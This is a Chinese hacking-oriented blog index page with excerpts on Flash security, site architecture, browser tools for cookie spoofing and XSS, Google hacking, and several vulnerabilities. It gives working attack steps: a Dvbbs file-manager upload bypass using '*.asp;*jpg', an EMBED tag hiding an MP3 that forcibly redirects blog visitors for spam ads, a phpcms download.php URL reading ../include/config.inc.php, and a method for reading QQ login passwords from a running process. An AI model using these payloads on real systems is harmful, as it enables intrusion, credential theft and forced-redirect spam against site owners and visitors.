Chinadu's Blog

新闻来源:ZDNet(台湾)
研究员指出，Adobe Flash的安全政策有漏洞，可能导致骇客操纵浏览器处理Flash档的方式，造成访客浏览使用者上传内容的网站时涉险。
Foreground Security资深研究员Mike Bailey周三接受访问时表示，问题出在Adobe Flash的原始安全政策。他说：「Adobe应修改Flash Player处理安全政策的方式，不该允许任意的内容在未经许可的情况下，迳自存取应用程式。」

Bailey指出，Flash Player的预设状态是什麽都信任，但应该「只信任获使用者允许的」。

例如，某人可能上传看似某社群网站的图片，但其实却是一个有问题的Flash档，一旦开启就会在浏览器内执行恶意程式码。Foreground Security资讯长Mike Murray说，任何人只要阅览该图片，电脑就可能中毒。
阅读全文...

如果说1980年代是PC的时代，1990年代是互联网的时代，那么当下呢？当下是移动互联网的时代。移动互联网的基本要义，一言以蔽之，就是把手机与网站相连，每部手机在网站上都有独立的个人空间，成为手机的镜像。

一部小小的手机里面，可能同时装载着数十个软件。而且在同一时刻，可能好几个软件在同时运行。另外，还得时刻准备暂停运行，把手机CPU等资源让给电话通话等优先级别高的工作。还有，时刻需要准备应付网络连接中断，手机电池耗尽等等情况。总之，手机软件的结构设计，是做小的艺术。

移动网站的架构设计，与手机软件的架构设计有着本质的不同。如果说手机软件的特点在于小，那么网站的特点在于大。仅中国就有几亿手机用户，作为服务于移动业务的网站，它的质量来自于是否能够同时为大规模并发用户提供服务，是否能够处理海量数据，是否能够在需要扩大网站吞吐量的时候，只需要增加机器，而不需要对网站架构做大手术。这是做大的艺术。

提到做大规模网站，大家一定会想到云计算，想到Google File System，Chubby， BigTable，MapReduce等等。这些技术固然很好，但是它们仅仅是构成一个大型网站的技术要素。实际构建一个大型网站时，光知道技术要素是不够的，还得明白如何把各个要素有机地结合到一起。

“Flickr 网站架构研究”（http://www.ccthere.com/article/2357486）是一篇值得反复阅读的好文章。这篇文章不仅对一个大型网站的架构进行了系统解剖，逐条梳理，而且行文深入浅出。可惜这样的文章不多见。关于大型网站实例的讨论，散落在各处，而且内容零散。

学习和掌握构建大型网站的架构，需要汇总散落的文章，梳理零散的内容。做好这项工作很有意义，但是也比较困难。我们的体会是，不妨抓住以下几个主题，逐个分析大型网站的实例，然后横向比较。
阅读全文...

本次用到的工具百度都能搜到1.PrcView2.Win-Tool编码转换工具原理大概是这样，进程监听工具读取QQ登陆用的密码吧，因为用鼠标输密码也是能破解了。
下面介绍方法，我是用小号测试的，首先打开第一个工具，然后登陆QQ（在线的QQ就更新好友），然后在PrcView中找到进程项，右键查看启动信息。


阅读全文...

1. Add N Edit Cookies 查看和修改本地的Cookie，Cookie欺骗必备。
下载：http://code.google.com/p/editcookie/downloads/list

2. User Agent Switcher 修改浏览器的User Agent，可以用来XSS。
下载：https://addons.mozilla.org/zh-CN/firefox/addon/59

3. RefControl 修改Referer引用，也可以用来XSS或者突破一些防盗链。
下载：https://addons.mozilla.org/zh-CN/firefox/addon/953

4.Live HTTP Headers 记录本地的Get和Post数据，并可修改数据后重新提交。
下载：https://addons.mozilla.org/zh-CN/firefox/addon/3829

5. Poster 用来Post和Get数据。
下载：https://addons.mozilla.org/fr/firefox/addon/2691
阅读全文...

今天为论坛进行服务器空间的转移~~~先顺利将Mysql数据库用phpmyadmin导出~~
然后在新服务器上建好数据库后，然后进行导入！可是因为MySQL数据库的.sql文件大于2MB。所以在导入时就提示说超过2048KB的错误，不让导入….于是就引出了此文的解决办法，呵呵

解决办法：
阅读全文...

PS:这是很老的一篇文章了，最近要用，记录一下。
google hacking其实并算不上什么新东西,在早几年我在一些国外站点上就看见过相关的介绍,但是由于当时并没有重视这种技术,认为最多就只是用来找找未改名的mdb或者别人留下的webshell什么的,并无太大实际用途.但是前段时间仔细啃了些资料才猛然发觉google hacking其实并非如此简单...

google hacking的简单实现

记得以前看见过一篇文章写的就是简单的通过用www.google.com来搜索dvbbs6.mdb或conn.inc来获得一些站点的敏感信息.其实使用google中的一些语法可以提供给我们更多的信息(当然也提供给那些习惯攻击的人更多他们所想要的.),下面就来介绍一些常用的语法.
阅读全文...

作者：Oldjun

不经意的遇到这个国外的CMS系统：XOOPS 2.2.6，google了下，版本比较老了，没发现有什么已知漏洞，于是下源码自己看，还是没发现有啥可以利用了，只不过看到了几个鸡肋，于是发出来。

XOOPS is a web application platform written in PHP for the MySQL database.Its object orientation makes it an ideal tool for developing small or large community websites, intra company and corporate portals, weblogs and much more. (Reference : http://www.xoops.org).

1.Local File Inclusion Vulnerabilities：

/*
works with:
magic_quotes_gpc = Off
*/

现在能遇到这个php配置的，简直可以去买彩票了，所以够鸡肋的。

Local File Include vulnerability found in scripts:
modules/system/admin.php

看源码：
阅读全文...

又来一个新的库, 中国信息安全漏洞库（China Information Security Vulnerability Database，简称CNVD)

国家信息安全漏洞共享平台共建成员单位如下：

以下排名不分先后：

工作委员会：

国家计算机网络应急技术处理协调中心（CNCERT/CC）

国家信息技术安全研究中心

北京神州绿盟科技有限公司

北京启明星辰信息技术有限公司

沈阳东软系统集成工程有限公司

北京安氏领信科技发展有限公司

奇虎360软件（北京）有限公司

影响版本
Powered By Dvbbs Version 8.2.0
Powered By Dvbbs Version 8.1.0
Powered By Dvbbs Version 8.0.0

注册用户-我的主页-个人空间管理
userspace.asp?sid=0&act=modifyset（此URL在找不到个人空间管理情况下加）
然后编辑CSS风格-文件管理
Dv_plus/myspace/script/filemange.asp
上传 *.asp;*jpg

直接删除Dv_plus/myspace/script/filemange.asp，

信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
文章作者:eskry
前一段时间一直在研究网站暴力推广
在研究通过博客暴力推广时略有所得
和大家分享下
这次会利用到一个小工具
就是前一段时间很多人所说的MP3 0day
我写了一个利用工具
给几个朋友也玩了几个月了
这次也一起放出来吧
没什么技术含量,大牛飘过吧
该方法理论上通杀所有支持源码编辑的博客
具体利用方法如下:
先用随文附带的利用工具生成一个MP3文件
地址中填自己要挂广告的网址
将MP3文件上传到自己的空间里
把MP3文件网络链接地址记下
然后进入新浪或网易等博客
写一篇日志
选择源码编辑模式
在当中加入
<EMBED height=1 type=application/x-mplayer2 align=baseline pluginspage="" width=1
src=http://127.0.0.1/test.mp3 ALLOWSCRIPTACCESS="samedomain" BORDER="0" AUTOSTART="1"></EMBED>
http://127.0.0.1/test.mp3 替换为你的MP3文件网络链接地址
点击日志
就会自动转向你指定的页面
一次暴力广告推广就成功了

点击下载

漏洞文件download.php

PHP代码：

< ?php
require dirname(__FILE__).'/include/common.inc.php';

$a_k = phpcms_auth($a_k, 'DECODE', AUTH_KEY); //注意!!
if(emptyempty($a_k)) showmessage($LANG['illegal_parameters']);
parse_str($a_k);

if(isset($i)) $downid = intval($i);
if(!isset($m)) showmessage($LANG['illegal_parameters']);
if(emptyempty($f)) showmessage('地址失效');
if(!$i || $m<0) showmessage($LANG['illegal_parameters']);
if(!isset($t)) showmessage($LANG['illegal_parameters']);
if(!isset($ip)) showmessage($LANG['illegal_parameters']);
$starttime = intval($t);

$fileurl = trim($f);
if(!$downid || emptyempty($fileurl) || !preg_match("/[0-9]{10}/", $starttime) || !preg_match("/[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}/", $ip) || $ip != IP) showmessage($LANG['illegal_parameters']);

$endtime = TIME - $starttime;
if($endtime > 3600) showmessage('地址失效');
if($m) $fileurl = trim($s).trim($fileurl);

if(strpos($fileurl, '://'))//远程文件
{
header("Location: $fileurl");
}
else//本地文件
{
if($d == 0)
{
header("Location: ".SITE_URL.$fileurl);
}
else
{
$fileurl = file_exists($fileurl) ? stripslashes($fileurl) : PHPCMS_ROOT.$fileurl;//此处可能为物理路径
$filename = basename($fileurl);
if(preg_match("/^([\s\S]*?)([\x81-\xfe][\x40-\xfe])([\s\S]*?)/", $fileurl))//处理中文文件
{
$filename = str_replace(array("%5C", "%2F", "%3A"), array("\\", "/", ":"), urlencode($fileurl));
$filename = urldecode(basename($filename));
}
file_down($fileurl, $filename);
}
}
?>

function file_down($filepath, $filename = '')
{
if(!$filename) $filename = basename($filepath);
if(is_ie()) $filename = rawurlencode($filename); $filetype = fileext($filename);
$filesize = sprintf("%u", filesize($filepath));
if(ob_get_length() !== false) @ob_end_clean();
header('Pragma: public');
header('Last-Modified: '.gmdate('D, d M Y H:i:s') . ' GMT');
header('Cache-Control: no-store, no-cache, must-revalidate');
header('Cache-Control: pre-check=0, post-check=0, max-age=0');
header('Content-Transfer-Encoding: binary');
header('Content-Encoding: none');
header('Content-type: '.$filetype);
header('Content-Disposition: attachment; filename="'.$filename.'"');
header('Content-length: '.$filesize);
readfile($filepath);
exit;

其实$i,$m,$f,$ip等都是地址栏的参数没有过滤(在down.php中可以看到)由parse_str($a_k)解释后得到的,又由于$a_k 是经phpcms_auth($a_k, 'DECODE', AUTH_KEY)解密后才能得到参数,但我本地测试构造$a_k变量的加密值不成功就换了个方法,把$a_k构造成不存在的参数然后下面的$i,$m,$f,$ip我就直接从地址栏中添加!测试如下:

http://www.xxxx.cn/download.php?a_k=Jh5zIw==&i=20&m=2&f=../include/config.inc.php&t=2233577313&ip=119.123.178.19&s=m/&d=1

浩瀚的大海，深邃的崖洞，在一片银白的沙滩上，膝盖上放着笔记本的您正姿态优雅地在躺椅上查看最新的股价信息、足球资讯，正在享受自由、可移动、随时随地的无线网络所带来的无限空间。突然，鼠标停滞，屏幕模糊，系统瘫痪，随即自动关机，在那一刹那，您的第一感觉是什么?没错，病毒、黑客，或者是木马!

　　这就是无线网络的两面性。一方面，它可以带给用户飞一般网上冲浪的感觉，而另一方面，它也可以带给用户不确定的网络安全。和有线网络一样，病毒、黑客、蠕虫，木马、间谍软件，随时都在威胁着无线网络的安全，并且无线网络比有线网络更容易遭侵害，因为用户在使用无线网络时的安全意识和掌握的技术手段还比较差。不能因为有人用枪杀人而停止枪的生产，同样不能因为无线网络会带来安全隐患而不去推广无线网络的使用。其实，无线网络安全隐患并不可怕，只要掌握一些基本的无线网络安全技术，就完全可以畅游网络而不惧病毒。

　　网络：加强安全防范迫在眉睫

　　在书房呆累了，小明抗着笔记本来到了客厅，奇怪的发现上网的速度怎么突然变快了?难道远离了AP(AP 在书房)上网速度还更快?当然不会，这是因为由于客厅离隔壁的书房较近的原因，小明无意间访问了邻居的无线网络，而邻居申请的网络速度比小明的快所致。我们假设，小明接着访问了邻居的共享磁盘，正好磁盘里有银行卡密码、投标书、个人日记，甚至是一些个人图片，结果会怎么样?

　　为了让更多的人可以访问到，无线网络选择了通过特定的无线电波来传送，在这个发射频率的有效范围内，任何具有合适接收设备的人都可以捕获该频率的信号，进而进入目标网络一个员工在公司阳台也可以访问公司网络，但这同时也意味着，蹲在公司阳台下面的竞争对手的情报人员也可以访问公司的网络，畅通无阻，而这个人拿着笔记本，也可以到全国各地的竞争对手阳台下去拿一些情报。
阅读全文...